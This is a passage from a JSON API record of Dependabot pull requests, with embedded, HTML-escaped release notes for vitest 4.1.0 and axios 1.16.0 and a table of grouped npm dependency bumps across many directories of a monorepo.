href=\"https://redirect.github.com/vitest-dev/vitest/issues/9235\"\u003evitest-dev/vitest#9235\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/2f367fad3\"\u003e\u003c!-- raw HTML omitted --\u003e(2f367)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd filters to \u003ccode\u003ecreateSpecification\u003c/code\u003e  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9336\"\u003evitest-dev/vitest#9336\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/c8e6c7fbf\"\u003e\u003c!-- raw HTML omitted --\u003e(c8e6c)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eExpose \u003ccode\u003erunTestFiles\u003c/code\u003e as alternative to \u003ccode\u003erunTestSpecifications\u003c/code\u003e  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9443\"\u003evitest-dev/vitest#9443\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/43d761821\"\u003e\u003c!-- raw HTML omitted --\u003e(43d76)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003eallowWrite\u003c/code\u003e and \u003ccode\u003eallowExec\u003c/code\u003e options to \u003ccode\u003eapi\u003c/code\u003e  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9350\"\u003evitest-dev/vitest#9350\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/20e00ef78\"\u003e\u003c!-- raw HTML omitted --\u003e(20e00)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAllow passing down test cases to \u003ccode\u003etoTestSpecification\u003c/code\u003e  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9627\"\u003evitest-dev/vitest#9627\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/6f17d5ddf\"\u003e\u003c!-- raw HTML omitted --\u003e(6f17d)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ebrowser\u003c/strong\u003e:\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003euserEvent.wheel\u003c/code\u003e API  -  by \u003ca href=\"https://github.com/macarie\"\u003e\u003ccode\u003e@​macarie\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9188\"\u003evitest-dev/vitest#9188\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/660801979\"\u003e\u003c!-- raw HTML omitted --\u003e(66080)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003efilterNode\u003c/code\u003e option to prettyDOM for filtering browser assertion error output  -  by \u003ca href=\"https://github.com/Copilot\"\u003e\u003ccode\u003e@​Copilot\u003c/code\u003e\u003c/a\u003e, \u003cstrong\u003esheremet-va\u003c/strong\u003e and \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9475\"\u003evitest-dev/vitest#9475\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/d3220fcd8\"\u003e\u003c!-- raw HTML omitted --\u003e(d3220)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport playwright persistent context  -  by \u003ca href=\"https://github.com/hi-ogawa\"\u003e\u003ccode\u003e@​hi-ogawa\u003c/code\u003e\u003c/a\u003e, \u003cstrong\u003eClaude Opus 4.6\u003c/strong\u003e and \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9229\"\u003evitest-dev/vitest#9229\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/f865d2ba4\"\u003e\u003c!-- raw HTML omitted --\u003e(f865d)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003edetailsPanelPosition\u003c/code\u003e option and button  -  by \u003ca href=\"https://github.com/shairez\"\u003e\u003ccode\u003e@​shairez\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9525\"\u003evitest-dev/vitest#9525\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/c8a31147c\"\u003e\u003c!-- raw HTML omitted --\u003e(c8a31)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse BlazeDiff instead of pixelmatch  -  by \u003ca href=\"https://github.com/macarie\"\u003e\u003ccode\u003e@​macarie\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9514\"\u003evitest-dev/vitest#9514\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/309362089\"\u003e\u003c!-- raw HTML omitted --\u003e(30936)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003efindElement\u003c/code\u003e and enable strict mode in webdriverio and preview  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9677\"\u003evitest-dev/vitest#9677\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/c3f37721c\"\u003e\u003c!-- raw HTML omitted --\u003e(c3f37)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecli\u003c/strong\u003e:\n\u003cul\u003e\n\u003cli\u003eAdd \u003ca href=\"https://github.com/bomb\"\u003e\u003ccode\u003e@​bomb\u003c/code\u003e\u003c/a\u003e.sh/tab completions  -  by \u003ca href=\"https://github.com/AmirSa12\"\u003e\u003ccode\u003e@​AmirSa12\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/8639\"\u003evitest-dev/vitest#8639\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/200f31704\"\u003e\u003c!-- raw HTML omitted --\u003e(200f3)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecoverage\u003c/strong\u003e:\n\u003cul\u003e\n\u003cli\u003eSupport \u003ccode\u003eignore start/stop\u003c/code\u003e ignore hints  -  by \u003ca href=\"https://github.com/AriPerkkio\"\u003e\u003ccode\u003e@​AriPerkkio\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9204\"\u003evitest-dev/vitest#9204\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/e59c94ba6\"\u003e\u003c!-- raw HTML omitted --\u003e(e59c9)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003ecoverage.changed\u003c/code\u003e option to report only changed files  -  by \u003ca href=\"https://github.com/kykim00\"\u003e\u003ccode\u003e@​kykim00\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/AriPerkkio\"\u003e\u003ccode\u003e@​AriPerkkio\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9521\"\u003evitest-dev/vitest#9521\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/1d9392c67\"\u003e\u003c!-- raw HTML omitted --\u003e(1d939)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eexperimental\u003c/strong\u003e:\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003eonModuleRunner\u003c/code\u003e hook to \u003ccode\u003eworker.init\u003c/code\u003e  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9286\"\u003evitest-dev/vitest#9286\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/e977f3deb\"\u003e\u003c!-- raw HTML omitted --\u003e(e977f)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eOption to disable the module runner  -  by \u003ca href=\"https://github.com/sheremet-va\"\u003e\u003ccode\u003e@​sheremet-va\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/AriPerkkio\"\u003e\u003ccode\u003e@​AriPerkkio\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/vitest-dev/vitest/issues/9210\"\u003evitest-dev/vitest#9210\u003c/a\u003e \u003ca href=\"https://github.com/vitest-dev/vitest/commit/9be6121ee\"\u003e\u003c!-- raw HTML omitted --\u003e(9be61)\u003c!-- raw HTML omitted --\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitest-dev/vitest/commit/4150b913171bda3971a4a4c47c633c26d0c6ae45\"\u003e\u003ccode\u003e4150b91\u003c/code\u003e\u003c/a\u003e chore: release v4.1.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitest-dev/vitest/commit/1de0aa22dd6311a93546a75a3c58a6be519c1baf\"\u003e\u003ccode\u003e1de0aa2\u003c/code\u003e\u003c/a\u003e fix: correctly identify concurrent test during static analysis (\u003ca href=\"https://github.com/vitest-dev/vitest/tree/HEAD/packages/vitest/issues/9846\"\u003e#9846\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitest-dev/vitest/commit/c3cac1c1b5a...\n\n_Description has been truncated_","html_url":"https://github.com/c6ai/langchainjs/pull/25","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/c6ai%2Flangchainjs/issues/25","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/25/packages"}},{"old_version":"3.3.1","new_version":"5.2.4","update_type":"major","path":null,"pr_created_at":"2026-05-30T23:17:51.000Z","version_change":"3.3.1 → 5.2.4","issue":{"uuid":"4555980909","node_id":"PR_kwDON5hC5M7hBB4D","number":137,"state":"open","title":"chore(deps): bump the npm_and_yarn group across 13 directories with 12 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-30T23:17:51.000Z","updated_at":"2026-05-30T23:18:20.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":12,"packages":[{"name":"axios","old_version":"1.15.0","new_version":"1.16.0","repository_url":"https://github.com/axios/axios"},{"name":"postcss","old_version":"8.4.31","new_version":"8.5.10","repository_url":"https://github.com/postcss/postcss"},{"name":"qs","old_version":"6.11.2","new_version":"6.15.2","repository_url":"https://github.com/ljharb/qs"},{"name":"webpack-dev-server","old_version":"3.3.1","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"rollup","old_version":"0.46.3","new_version":"2.80.0","repository_url":"https://github.com/rollup/rollup"},{"name":"simple-git","old_version":"3.32.3","new_version":"3.36.0","repository_url":"https://github.com/steveukx/git-js"},{"name":"ws","old_version":"6.2.2","new_version":"6.2.3","repository_url":"https://github.com/websockets/ws"},{"name":"brace-expansion","old_version":"1.1.11","new_version":"1.1.15","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"pbkdf2","old_version":"3.0.17","new_version":"3.1.6","repository_url":"https://github.com/browserify/pbkdf2"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 9 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [axios](https://github.com/axios/axios) | `1.15.0` | `1.16.0` |\n| [postcss](https://github.com/postcss/postcss) | `8.4.31` | `8.5.10` |\n| [qs](https://github.com/ljharb/qs) | `6.11.2` | `6.15.2` |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `3.3.1` | `5.2.4` |\n| [rollup](https://github.com/rollup/rollup) | `0.46.3` | `2.80.0` |\n| [simple-git](https://github.com/steveukx/git-js/tree/HEAD/simple-git) | `3.32.3` | `3.36.0` |\n| [ws](https://github.com/websockets/ws) | `6.2.2` | `6.2.3` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.15` |\n| [pbkdf2](https://github.com/browserify/pbkdf2) | `3.0.17` | `3.1.6` |\n\nBumps the npm_and_yarn group with 1 update in the /packages/app directory: [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\nBumps the npm_and_yarn group with 1 update in the /packages/app/src/app/overmind/effects/vscode/LinterWorker directory: [brace-expansion](https://github.com/juliangruber/brace-expansion).\nBumps the npm_and_yarn group with 1 update in the /packages/browser-eslint-rules directory: [rollup](https://github.com/rollup/rollup).\nBumps the npm_and_yarn group with 4 updates in the /packages/notifications/example directory: [minimatch](https://github.com/isaacs/minimatch), [lodash](https://github.com/lodash/lodash), [brace-expansion](https://github.com/juliangruber/brace-expansion) and [pbkdf2](https://github.com/browserify/pbkdf2).\nBumps the npm_and_yarn group with 1 update in the /packages/sse-hooks directory: [rollup](https://github.com/rollup/rollup).\nBumps the npm_and_yarn group with 3 updates in the /standalone-packages/browser-jsdom directory: [qs](https://github.com/ljharb/qs), [brace-expansion](https://github.com/juliangruber/brace-expansion) and [pbkdf2](https://github.com/browserify/pbkdf2).\nBumps the npm_and_yarn group with 4 updates in the /standalone-packages/codesandbox-browserfs directory: [webpack-dev-server](https://github.com/webpack/webpack-dev-server), [rollup](https://github.com/rollup/rollup), [brace-expansion](https://github.com/juliangruber/brace-expansion) and [pbkdf2](https://github.com/browserify/pbkdf2).\nBumps the npm_and_yarn group with 1 update in the /standalone-packages/monaco-editor directory: [brace-expansion](https://github.com/juliangruber/brace-expansion).\nBumps the npm_and_yarn group with 2 updates in the /standalone-packages/sse-loading-screen directory: [axios](https://github.com/axios/axios) and [brace-expansion](https://github.com/juliangruber/brace-expansion).\nBumps the npm_and_yarn group with 2 updates in the /standalone-packages/vscode-editor directory: [ws](https://github.com/websockets/ws) and [brace-expansion](https://github.com/juliangruber/brace-expansion).\nBumps the npm_and_yarn group with 1 update in the /standalone-packages/vscode-extensions directory: [brace-expansion](https://github.com/juliangruber/brace-expansion).\nBumps the npm_and_yarn group with 1 update in the /standalone-packages/vscode-textmate directory: [brace-expansion](https://github.com/juliangruber/brace-expansion).\n\nUpdates `axios` from 1.15.0 to 1.16.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/releases\"\u003eaxios's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.16.0 — May 2, 2026\u003c/h2\u003e\n\u003cp\u003eThis release adds support for the QUERY HTTP method and a new \u003ccode\u003eECONNREFUSED\u003c/code\u003e error constant, lands a substantial wave of HTTP, fetch, and XHR adapter bug fixes around redirects, aborts, headers, and timeouts, and welcomes 23 new contributors.\u003c/p\u003e\n\u003ch2\u003e⚠️ Notable Changes\u003c/h2\u003e\n\u003cp\u003eA handful of fixes in this release are either security-adjacent or change observable behaviour. Please review before upgrading:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFetch adapter now enforces \u003ccode\u003emaxBodyLength\u003c/code\u003e and \u003ccode\u003emaxContentLength\u003c/code\u003e.\u003c/strong\u003e These limits were silently ignored on the fetch adapter prior to 1.16.0 — anyone relying on them as a safety net (DoS protection, accidental large uploads) had no protection. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10795\"\u003e#10795\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eProxy requests now preserve user-supplied \u003ccode\u003eHost\u003c/code\u003e headers.\u003c/strong\u003e Previously, the proxy path could overwrite a custom \u003ccode\u003eHost\u003c/code\u003e. Virtual-host-style routing through a proxy will now behave correctly. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10822\"\u003e#10822\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eBasic auth credentials embedded in URLs are now URL-decoded.\u003c/strong\u003e If you have percent-encoded credentials in a URL (e.g. \u003ccode\u003ehttps://user:p%40ss@host\u003c/code\u003e), the decoded value is what now goes on the wire. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10825\"\u003e#10825\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eparseProtocol\u003c/code\u003e now strictly requires a colon in the protocol separator.\u003c/strong\u003e Strings that loosely parsed as protocols before may no longer match. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10729\"\u003e#10729\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDeprecated \u003ccode\u003eunescape()\u003c/code\u003e replaced with modern UTF-8 encoding.\u003c/strong\u003e Non-ASCII URL handling is now spec-correct; consumers depending on legacy \u003ccode\u003eunescape()\u003c/code\u003e quirks may see different output bytes. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7378\"\u003e#7378\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003etransformRequest\u003c/code\u003e input typing change was reverted.\u003c/strong\u003e The typing change introduced in \u003ca href=\"https://redirect.github.com/axios/axios/issues/10745\"\u003e#10745\u003c/a\u003e was reverted in \u003ca href=\"https://redirect.github.com/axios/axios/issues/10810\"\u003e#10810\u003c/a\u003e after follow-up review — net behavior is unchanged from 1.15.2. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10745\"\u003e#10745\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10810\"\u003e#10810\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eQUERY HTTP Method:\u003c/strong\u003e Added support for the QUERY HTTP method across adapters and type definitions. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10802\"\u003e#10802\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eECONNREFUSED Error Constant:\u003c/strong\u003e Exposed \u003ccode\u003eECONNREFUSED\u003c/code\u003e as a constant on \u003ccode\u003eAxiosError\u003c/code\u003e so callers can match connection-refused failures without comparing string literals (closes \u003ca href=\"https://redirect.github.com/axios/axios/issues/6485\"\u003e#6485\u003c/a\u003e). (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10680\"\u003e#10680\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eEncode Helper Export:\u003c/strong\u003e Exported the internal \u003ccode\u003eencode\u003c/code\u003e helper from \u003ccode\u003ebuildURL\u003c/code\u003e so userland param serializers can reuse the same encoding logic that axios uses internally. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/6897\"\u003e#6897\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eHTTP Adapter — Redirects \u0026amp; Headers:\u003c/strong\u003e Cleared stale headers when a redirect targets a no-proxy host, fixed the redirect listener chain so listeners no longer stack across hops, restored the missing \u003ccode\u003erequestDetails\u003c/code\u003e argument on \u003ccode\u003ebeforeRedirect\u003c/code\u003e, preserved user-supplied \u003ccode\u003eHost\u003c/code\u003e headers when forwarding through a proxy, and properly URL-decoded basic auth credentials. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10794\"\u003e#10794\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10800\"\u003e#10800\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/6241\"\u003e#6241\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10822\"\u003e#10822\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10825\"\u003e#10825\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHTTP Adapter — Streams \u0026amp; Timeouts:\u003c/strong\u003e Preserved the partial response object on \u003ccode\u003eAxiosError\u003c/code\u003e when a stream is aborted after headers arrive, honoured the \u003ccode\u003etimeout\u003c/code\u003e option during the connect phase when redirects are disabled, and resolved an unsettled-promise hang when an aborted request was combined with compression and \u003ccode\u003emaxRedirects: 0\u003c/code\u003e. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10708\"\u003e#10708\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10819\"\u003e#10819\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7149\"\u003e#7149\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFetch Adapter:\u003c/strong\u003e Enforced \u003ccode\u003emaxBodyLength\u003c/code\u003e / \u003ccode\u003emaxContentLength\u003c/code\u003e in the fetch adapter, set the \u003ccode\u003eUser-Agent\u003c/code\u003e header to match the HTTP adapter, preserved the original abort reason instead of replacing it with a generic error, and deferred global access so importing the module no longer throws a \u003ccode\u003eTypeError\u003c/code\u003e in restricted environments. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10795\"\u003e#10795\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10772\"\u003e#10772\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10806\"\u003e#10806\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7260\"\u003e#7260\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eXHR Adapter:\u003c/strong\u003e Unsubscribed the \u003ccode\u003ecancelToken\u003c/code\u003e and \u003ccode\u003eAbortSignal\u003c/code\u003e listeners on the error, timeout, and abort code paths to prevent leaked subscriptions. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10787\"\u003e#10787\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eError Handling:\u003c/strong\u003e Attached the parsed response to \u003ccode\u003eAxiosError\u003c/code\u003e when \u003ccode\u003eJSON.parse\u003c/code\u003e fails inside \u003ccode\u003edispatchRequest\u003c/code\u003e, prevented \u003ccode\u003esettle\u003c/code\u003e from emitting \u003ccode\u003eundefined\u003c/code\u003e error codes, and tightened the \u003ccode\u003eparseProtocol\u003c/code\u003e regex to require a colon in the protocol separator. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10724\"\u003e#10724\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7276\"\u003e#7276\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10729\"\u003e#10729\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eTypes \u0026amp; Exports:\u003c/strong\u003e Aligned the CommonJS \u003ccode\u003eCancelToken\u003c/code\u003e typings with the ESM build, fixed a compiler error caused by \u003ccode\u003eRawAxiosHeaders\u003c/code\u003e, and re-exported \u003ccode\u003ecreate\u003c/code\u003e from the package index. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7414\"\u003e#7414\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/6389\"\u003e#6389\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/6460\"\u003e#6460\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eUTF-8 Encoding:\u003c/strong\u003e Replaced the deprecated \u003ccode\u003eunescape()\u003c/code\u003e call with a modern UTF-8 encoding implementation. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7378\"\u003e#7378\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMisc Cleanup:\u003c/strong\u003e Resolved a batch of small inconsistencies and gadget-level issues across the codebase. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10833\"\u003e#10833\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eRefactor — ES6 Modernisation:\u003c/strong\u003e Modernised the \u003ccode\u003eutils\u003c/code\u003e module and XHR adapter to use ES6 features, and tidied the multipart boundary error message. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10588\"\u003e#10588\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7419\"\u003e#7419\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eTests:\u003c/strong\u003e Hardened the HTTP test server lifecycle to fix flaky \u003ccode\u003eFormData\u003c/code\u003e EPIPE failures, fixed Win32 platform support for the pipe tests, and corrected an incorrect test assumption. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10820\"\u003e#10820\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10791\"\u003e#10791\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10796\"\u003e#10796\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDocs:\u003c/strong\u003e Documented \u003ccode\u003eparamsSerializer.encode\u003c/code\u003e for strict RFC 3986 query encoding, updated the \u003ccode\u003eparseReviver\u003c/code\u003e TypeScript definitions and configuration docs for ES2023, added timeout guidance to the README's first async example, and expanded notes around the recent type changes. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10821\"\u003e#10821\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10782\"\u003e#10782\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10759\"\u003e#10759\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10804\"\u003e#10804\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eReverted:\u003c/strong\u003e Reverted the \u003ccode\u003etransformRequest\u003c/code\u003e input typing change from \u003ca href=\"https://redirect.github.com/axios/axios/issues/10745\"\u003e#10745\u003c/a\u003e after 